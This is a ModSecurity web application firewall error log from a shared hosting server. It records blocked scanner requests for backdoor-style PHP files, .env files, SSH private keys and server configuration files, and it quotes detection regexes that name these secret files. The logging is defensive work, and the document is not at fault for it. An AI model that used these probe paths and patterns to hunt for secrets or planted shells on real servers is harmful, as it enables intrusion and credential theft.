[Tue May 26 13:10:54.959561 2026] [security2:error] [pid 496740:tid 496944] [client 172.202.92.73:59923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/k.php"] [unique_id "ahVOhuvOeft4ltnLrH4pMgAAAEo"]
[Tue May 26 13:10:54.959689 2026] [security2:error] [pid 496740:tid 496944] [client 172.202.92.73:59923] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/k.php"] [unique_id "ahVOhuvOeft4ltnLrH4pMgAAAEo"]
[Tue May 26 13:10:56.295225 2026] [security2:error] [pid 496740:tid 496924] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOh-vOeft4ltnLrH4pXAAAADY"]
[Tue May 26 13:10:58.140478 2026] [security2:error] [pid 496740:tid 496886] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOievOeft4ltnLrH4prQAAABA"]
[Tue May 26 13:11:00.557356 2026] [security2:error] [pid 496740:tid 496972] [client 172.202.92.73:48373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/o.php"] [unique_id "ahVOjOvOeft4ltnLrH4qKgAAAGY"]
[Tue May 26 13:11:00.557460 2026] [security2:error] [pid 496740:tid 496972] [client 172.202.92.73:48373] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/o.php"] [unique_id "ahVOjOvOeft4ltnLrH4qKgAAAGY"]
[Tue May 26 13:11:01.443749 2026] [security2:error] [pid 496740:tid 496970] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOjevOeft4ltnLrH4qQQAAAGQ"]
[Tue May 26 13:11:02.882205 2026] [security2:error] [pid 496740:tid 496783] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.htaccess.orig"] [unique_id "ahVOjuvOeft4ltnLrH4qhQAAQSo"]
[Tue May 26 13:11:03.638942 2026] [security2:error] [pid 496740:tid 496817] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "httpd.conf"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/httpd.conf"] [unique_id "ahVOj-vOeft4ltnLrH4qrwAAMUw"]
[Tue May 26 13:11:03.864712 2026] [security2:error] [pid 496740:tid 496897] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOj-vOeft4ltnLrH4qnwAAABs"]
[Tue May 26 13:11:04.062042 2026] [security2:error] [pid 496740:tid 496994] [client 172.202.92.73:55716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/bb.php"] [unique_id "ahVOkOvOeft4ltnLrH4qyAAAAHw"]
[Tue May 26 13:11:04.062152 2026] [security2:error] [pid 496740:tid 496994] [client 172.202.92.73:55716] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/bb.php"] [unique_id "ahVOkOvOeft4ltnLrH4qyAAAAHw"]
[Tue May 26 13:11:05.133274 2026] [security2:error] [pid 496740:tid 496970] [client 176.65.139.233:25942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVOkevOeft4ltnLrH4rAQAAAGQ"]
[Tue May 26 13:11:05.405919 2026] [security2:error] [pid 496740:tid 496978] [client 71.6.146.185:50394] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "162.222.227.191"] [uri "/cgi-sys/404.html"] [unique_id "ahVOkevOeft4ltnLrH4rFAAAAGw"]
[Tue May 26 13:11:05.747510 2026] [security2:error] [pid 496740:tid 496966] [client 172.202.92.73:55211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/rip.php"] [unique_id "ahVOkevOeft4ltnLrH4rKAAAAGA"]
[Tue May 26 13:11:05.747617 2026] [security2:error] [pid 496740:tid 496966] [client 172.202.92.73:55211] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/rip.php"] [unique_id "ahVOkevOeft4ltnLrH4rKAAAAGA"]
[Tue May 26 13:11:05.752191 2026] [security2:error] [pid 496740:tid 496954] [client 71.6.146.185:50570] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "162.222.227.191"] [uri "/cgi-sys/404.html"] [unique_id "ahVOkevOeft4ltnLrH4rKQAAAFQ"]
[Tue May 26 13:11:05.768240 2026] [security2:error] [pid 496740:tid 496979] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOkevOeft4ltnLrH4rEQAAAG0"]
[Tue May 26 13:11:06.315128 2026] [security2:error] [pid 496740:tid 496746] [remote 149.102.129.214:41286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.129.102.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVOkuvOeft4ltnLrH4rPQAAAAU"]
[Tue May 26 13:11:07.373412 2026] [security2:error] [pid 496740:tid 496995] [client 172.202.92.73:58970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/s.php"] [unique_id "ahVOk-vOeft4ltnLrH4rfQAAAH0"]
[Tue May 26 13:11:07.373561 2026] [security2:error] [pid 496740:tid 496995] [client 172.202.92.73:58970] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/s.php"] [unique_id "ahVOk-vOeft4ltnLrH4rfQAAAH0"]
[Tue May 26 13:11:07.864754 2026] [security2:error] [pid 496740:tid 496989] [client 71.6.146.185:51222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "162.222.227.191"] [uri "/cgi-sys/404.html"] [unique_id "ahVOk-vOeft4ltnLrH4rlAAAAHc"]
[Tue May 26 13:11:08.036859 2026] [security2:error] [pid 496740:tid 496959] [client 185.191.171.15:32928] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVOlOvOeft4ltnLrH4rnAAAAFk"]
[Tue May 26 13:11:08.036985 2026] [security2:error] [pid 496740:tid 496959] [client 185.191.171.15:32928] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVOlOvOeft4ltnLrH4rnAAAAFk"]
[Tue May 26 13:11:08.231596 2026] [security2:error] [pid 496740:tid 496909] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOk-vOeft4ltnLrH4rkAAAACc"]
[Tue May 26 13:11:10.402278 2026] [security2:error] [pid 496740:tid 496769] [remote 74.7.241.58:32882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVOluvOeft4ltnLrH4r9AAAEhw"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:11:10.779066 2026] [security2:error] [pid 496740:tid 496953] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOluvOeft4ltnLrH4r9wAAAFM"]
[Tue May 26 13:11:13.889368 2026] [security2:error] [pid 496740:tid 496910] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOmevOeft4ltnLrH4scQAAACg"]
[Tue May 26 13:11:16.437752 2026] [security2:error] [pid 496740:tid 496975] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOnOvOeft4ltnLrH4s0QAAAGk"]
[Tue May 26 13:11:17.089249 2026] [security2:error] [pid 496740:tid 496979] [client 187.19.26.155:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOnOvOeft4ltnLrH4s9QAAAG0"]
[Tue May 26 13:11:18.215465 2026] [security2:error] [pid 496740:tid 496976] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOnevOeft4ltnLrH4tMgAAAGo"]
[Tue May 26 13:11:20.648289 2026] [security2:error] [pid 496740:tid 496797] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/id_rsa"] [unique_id "ahVOoOvOeft4ltnLrH4t2wAATjg"]
[Tue May 26 13:11:20.746088 2026] [security2:error] [pid 496740:tid 496896] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOoOvOeft4ltnLrH4tzwAAABo"]
[Tue May 26 13:11:21.009696 2026] [security2:error] [pid 496740:tid 496790] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/id_dsa"] [unique_id "ahVOoevOeft4ltnLrH4t6gAARjE"]
[Tue May 26 13:11:21.112226 2026] [authz_core:error] [pid 496740:tid 496953] [client 176.65.139.236:47896] AH01630: client denied by server configuration: /home2/azurm42s/public_html/erptrn.azurmediatec.com/.env
[Tue May 26 13:11:23.886640 2026] [security2:error] [pid 496740:tid 496888] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOo-vOeft4ltnLrH4ubAAAABI"]
[Tue May 26 13:11:25.844795 2026] [security2:error] [pid 496740:tid 496995] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOpevOeft4ltnLrH4uuwAAAH0"]
[Tue May 26 13:11:26.227646 2026] [security2:error] [pid 496740:tid 496929] [client 20.151.117.104:59286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVOpuvOeft4ltnLrH4u2QAAADs"]
[Tue May 26 13:11:26.227774 2026] [security2:error] [pid 496740:tid 496929] [client 20.151.117.104:59286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVOpuvOeft4ltnLrH4u2QAAADs"]
[Tue May 26 13:11:26.377862 2026] [security2:error] [pid 496740:tid 496876] [client 20.151.117.104:37153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/rip.php"] [unique_id "ahVOpuvOeft4ltnLrH4u6AAAAAY"]
[Tue May 26 13:11:26.378054 2026] [security2:error] [pid 496740:tid 496876] [client 20.151.117.104:37153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/rip.php"] [unique_id "ahVOpuvOeft4ltnLrH4u6AAAAAY"]
[Tue May 26 13:11:26.521859 2026] [security2:error] [pid 496740:tid 496885] [client 20.151.117.104:6716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/archive.php"] [unique_id "ahVOpuvOeft4ltnLrH4u8AAAAA8"]
[Tue May 26 13:11:26.522024 2026] [security2:error] [pid 496740:tid 496885] [client 20.151.117.104:6716] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/archive.php"] [unique_id "ahVOpuvOeft4ltnLrH4u8AAAAA8"]
[Tue May 26 13:11:26.664681 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:42075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/66.php"] [unique_id "ahVOpuvOeft4ltnLrH4u9QAAAC0"]
[Tue May 26 13:11:26.664803 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:42075] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/66.php"] [unique_id "ahVOpuvOeft4ltnLrH4u9QAAAC0"]
[Tue May 26 13:11:26.806942 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:27701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ioxi-o.php"] [unique_id "ahVOpuvOeft4ltnLrH4u_wAAACw"]
[Tue May 26 13:11:26.807046 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:27701] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ioxi-o.php"] [unique_id "ahVOpuvOeft4ltnLrH4u_wAAACw"]
[Tue May 26 13:11:26.955671 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:40674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ms-edit.php"] [unique_id "ahVOpuvOeft4ltnLrH4vAgAAAH0"]
[Tue May 26 13:11:26.955776 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:40674] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ms-edit.php"] [unique_id "ahVOpuvOeft4ltnLrH4vAgAAAH0"]
[Tue May 26 13:11:27.077171 2026] [security2:error] [pid 496740:tid 496951] [client 49.13.130.29:15004] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVOp-vOeft4ltnLrH4vBgAAAFE"], referer: https://thegoodsporting.com
[Tue May 26 13:11:27.098699 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:14314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVOp-vOeft4ltnLrH4vCgAAAAc"]
[Tue May 26 13:11:27.098811 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:14314] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVOp-vOeft4ltnLrH4vCgAAAAc"]
[Tue May 26 13:11:27.247952 2026] [security2:error] [pid 496740:tid 496985] [client 20.151.117.104:28881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/404.php"] [unique_id "ahVOp-vOeft4ltnLrH4vFAAAAHM"]
[Tue May 26 13:11:27.248065 2026] [security2:error] [pid 496740:tid 496985] [client 20.151.117.104:28881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/404.php"] [unique_id "ahVOp-vOeft4ltnLrH4vFAAAAHM"]
[Tue May 26 13:11:27.395666 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:42053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/file3.php"] [unique_id "ahVOp-vOeft4ltnLrH4vGwAAAFQ"]
[Tue May 26 13:11:27.395760 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:42053] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/file3.php"] [unique_id "ahVOp-vOeft4ltnLrH4vGwAAAFQ"]
[Tue May 26 13:11:27.537717 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:14287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-mail.php"] [unique_id "ahVOp-vOeft4ltnLrH4vJQAAADg"]
[Tue May 26 13:11:27.537824 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:14287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-mail.php"] [unique_id "ahVOp-vOeft4ltnLrH4vJQAAADg"]
[Tue May 26 13:11:27.688749 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:6675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/byp.php"] [unique_id "ahVOp-vOeft4ltnLrH4vKQAAAGY"]
[Tue May 26 13:11:27.688865 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:6675] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/byp.php"] [unique_id "ahVOp-vOeft4ltnLrH4vKQAAAGY"]
[Tue May 26 13:11:27.831114 2026] [security2:error] [pid 496740:tid 496986] [client 20.151.117.104:35549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/index.php"] [unique_id "ahVOp-vOeft4ltnLrH4vMwAAAHQ"]
[Tue May 26 13:11:27.831210 2026] [security2:error] [pid 496740:tid 496986] [client 20.151.117.104:35549] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/index.php"] [unique_id "ahVOp-vOeft4ltnLrH4vMwAAAHQ"]
